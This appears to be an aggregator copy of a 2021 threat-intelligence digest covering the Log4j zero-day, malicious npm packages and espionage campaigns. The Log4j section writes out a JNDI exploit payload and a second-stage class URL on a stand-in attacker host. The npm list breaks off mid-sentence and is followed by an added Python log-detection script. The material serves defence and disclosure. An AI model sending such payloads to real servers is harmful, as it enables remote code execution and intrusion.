One Article Review

Home - The article:
Source Anomali
Identifier 3800465
Publication date 2021-12-15 16:00:00 (viewed: 2021-12-15 16:05:55)
Title Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More
Text The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.

Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.

Trending Cyber News and Threat Intelligence

Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021)

A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, an open source Java package used to enable logging. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the Common Vulnerability Scoring System (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. The vulnerability affects millions of users, and exploitation proof-of-concept code exists; LunaSec explains how it is exploited in five simple steps:
1: Data from the user gets sent to the server (via any protocol).
2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker-controlled server).
3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via the Java Naming and Directory Interface (JNDI).
4: The response contains a path to a remote Java class file (e.g. http://second-stage.attacker.com/Exploit.class), which is injected into the server process.
5: This injected payload triggers a second stage and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability; however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap" and "jndi", but this detection method is easily bypassable.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file

Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021)

Researchers from the DevOps firm JFrog have found at least 17 malicious packages on the open source npm registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1
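The Log4j Analyst Comment above notes that filtering on keywords such as "jndi" and "ldap" caught the initial campaigns but is easily bypassed, and that the 2.15.0 fix rests on the log4j2.formatMsgNoLookups setting staying true. As an added example (not code from the Anomali article), the following Python looks for the JNDI lookup syntax itself in access-log lines, after URL-decoding, rather than for bare keywords, and checks whether that property is explicitly set to true. The log lines and property values are constructed; attacker.com is the placeholder host the article itself uses.

```python
import re
from urllib.parse import unquote

# Pattern for a Log4j JNDI lookup: "${jndi:<scheme>://<host>...". Matched
# case-insensitively, since the lookup name is not case-sensitive in Log4j.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/\s}]+)", re.IGNORECASE)

def normalize(line: str) -> str:
    """Undo up to two rounds of URL-encoding so a payload carried in a
    query string or header is inspected in its decoded form."""
    decoded = line
    for _ in range(2):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return decoded

def find_jndi_lookups(lines):
    """Return (line_number, scheme, host) for every log line that carries a
    JNDI lookup string; line numbers are 1-based."""
    hits = []
    for n, raw in enumerate(lines, start=1):
        for m in JNDI_RE.finditer(normalize(raw)):
            hits.append((n, m.group(1).lower(), m.group(2)))
    return hits

def lookups_disabled(jvm_props):
    """True only if log4j2.formatMsgNoLookups is explicitly "true"; the
    article's caveat is that setting it back to false re-enables lookups."""
    return jvm_props.get("log4j2.formatMsgNoLookups", "").strip().lower() == "true"

# Constructed sample access-log lines (not from the article). The last line is
# benign: it contains the keywords but no lookup syntax.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01] "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.com/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.com%2Fa%7D HTTP/1.1" 200',
    '10.0.0.7 - - [10/Dec/2021:12:00:04] "GET /search?q=jndi+ldap+tutorial HTTP/1.1" 200',
]

if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOGS):
        print("line %d: JNDI lookup via %s to %s" % hit)
    print("lookups disabled:", lookups_disabled({"log4j2.formatMsgNoLookups": "true"}))
```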
Sent Yes
Tags Malware Tool Vulnerability Threat Cloud
Stories APT 37 APT 29 APT 15 APT 15 APT 25


The article does not appear to have been picked up after its publication.


The article does not appear to have been picked up from a previous one.